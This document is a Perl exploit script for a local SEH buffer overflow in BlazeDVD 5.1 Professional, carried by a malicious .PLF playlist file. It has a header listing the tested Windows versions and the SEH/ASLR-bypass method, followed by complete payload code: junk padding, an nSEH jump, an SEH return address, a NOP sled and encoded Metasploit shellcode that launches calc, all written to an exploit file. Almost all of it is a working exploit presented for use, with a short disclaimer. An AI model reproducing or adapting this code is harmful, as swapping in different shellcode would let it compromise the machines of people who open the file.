| 
 
|  | # [*] Vulnerability     : BlazeDVD 5.1 Professional (.PLF File) Local BOF (SEH) Universal for XP and Vista # [*] Detected by       : hack4love (http://www.milw0rm.com/exploits/9329)
 # [*] Sploit coded by   : corelanc0d3r  (corelanc0d3r[at]gmail[dot]com)
 # [*] Sploit coded on   : August 23rd 2009
 # [*] Type              : local
 # [*] OS                : Windows
 # [*] Product           : BlazeDVD 5.1 Professional
 # [*] Versions affected : 5.1
 # [*] Download link     : http://www.blazevideo.com/dvd-player/index.htm
 # [*] -------------------------------------------------------------------------
 # [*] Method            : SEH - Universal - ASLR Bypass
 # [*] Tested on         : Windows XP SP2 Eng
 # [*]                   : Windows XP SP3 Eng
 # [*]                   : Windows Vista SP2 Eng (SP1 may work as well)
 # [*] Greetz&Tx to      : Saumil/SK
 # [*] -------------------------------------------------------------------------
 #                                               MMMMM~.
 #                                               MMMMM?.
 #    MMMMMM8.  .=MMMMMMM.. MMMMMMMM, MMMMMMM8.  MMMMM?. MMMMMMM:   MMMMMMMMMM.
 #  MMMMMMMMMM=.MMMMMMMMMMM.MMMMMMMM=MMMMMMMMMM=.MMMMM?7MMMMMMMMMM: MMMMMMMMMMM:
 #  MMMMMIMMMMM+MMMMM$MMMMM=MMMMMD$I8MMMMMIMMMMM~MMMMM?MMMMMZMMMMMI.MMMMMZMMMMM:
 #  MMMMM==7III~MMMMM=MMMMM=MMMMM$. 8MMMMMZ$$$$$~MMMMM?..MMMMMMMMMI.MMMMM+MMMMM:
 #  MMMMM=.     MMMMM=MMMMM=MMMMM7. 8MMMMM?    . MMMMM?NMMMM8MMMMMI.MMMMM+MMMMM:
 #  MMMMM=MMMMM+MMMMM=MMMMM=MMMMM7. 8MMMMM?MMMMM:MMMMM?MMMMMIMMMMMO.MMMMM+MMMMM:
 #  =MMMMMMMMMZ~MMMMMMMMMM8~MMMMM7. .MMMMMMMMMMO:MMMMM?MMMMMMMMMMMMIMMMMM+MMMMM:
 #  .:$MMMMMO7:..+OMMMMMO$=.MMMMM7.  ,IMMMMMMO$~ MMMMM?.?MMMOZMMMMZ~MMMMM+MMMMM:
 #     .,,,..      .,,,,.   .,,,,,     ..,,,..   .,,,,.. .,,...,,,. .,,,,..,,,,.
 #                                                                   eip hunters
 # -----------------------------------------------------------------------------
 # Script provided 'as is', without any warranty.
 # Use for educational purposes only.
 #
 my $sploitfile="blazesploit.plf";
 print "[+] Preparing payload\n";
 my $junk = "A" x 608;
 my $nseh = "\xeb\x18\x90\x90";
 my $seh = pack('V',0x100101e7);
 my $nop = "\x90" x 30;
 # windows/exec - 302 bytes
 # http://www.metasploit.com
 # Encoder: x86/alpha_upper
 # EXITFUNC=seh, CMD=calc
 my $shellcode="\x89\xe3\xdb\xc2\xd9\x73\xf4\x59\x49\x49\x49\x49\x49\x43" .
 "\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58" .
 "\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42" .
 "\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30" .
 "\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58" .
 "\x51\x54\x43\x30\x45\x50\x45\x50\x4c\x4b\x47\x35\x47\x4c" .
 "\x4c\x4b\x43\x4c\x43\x35\x44\x38\x43\x31\x4a\x4f\x4c\x4b" .
 "\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x47\x50\x45\x51\x4a\x4b" .
 "\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x45\x51\x4a\x4e\x50\x31" .
 "\x49\x50\x4c\x59\x4e\x4c\x4c\x44\x49\x50\x44\x34\x45\x57" .
 "\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4b\x44" .
 "\x47\x4b\x50\x54\x47\x54\x45\x54\x43\x45\x4a\x45\x4c\x4b" .
 "\x51\x4f\x46\x44\x45\x51\x4a\x4b\x45\x36\x4c\x4b\x44\x4c" .
 "\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c\x4b" .
 "\x45\x4c\x4c\x4b\x43\x31\x4a\x4b\x4d\x59\x51\x4c\x46\x44" .
 "\x43\x34\x49\x53\x51\x4f\x46\x51\x4b\x46\x43\x50\x46\x36" .
 "\x45\x34\x4c\x4b\x50\x46\x50\x30\x4c\x4b\x51\x50\x44\x4c" .
 "\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c\x4b\x42\x48\x43\x38" .
 "\x4b\x39\x4a\x58\x4d\x53\x49\x50\x43\x5a\x50\x50\x43\x58" .
 "\x4c\x30\x4d\x5a\x45\x54\x51\x4f\x42\x48\x4d\x48\x4b\x4e" .
 "\x4d\x5a\x44\x4e\x50\x57\x4b\x4f\x4b\x57\x43\x53\x43\x51" .
 "\x42\x4c\x43\x53\x43\x30\x41\x41";
 $payload =$junk.$nseh.$seh.$nop.$shellcode;
 print "[+] Writing exploit file $sploitfile\n";
 open ($FILE,">$sploitfile");
 print $FILE $payload;
 close($FILE);
 print "[+] ".length($payload)." bytes written to file\n";
 
 |   
|  |  |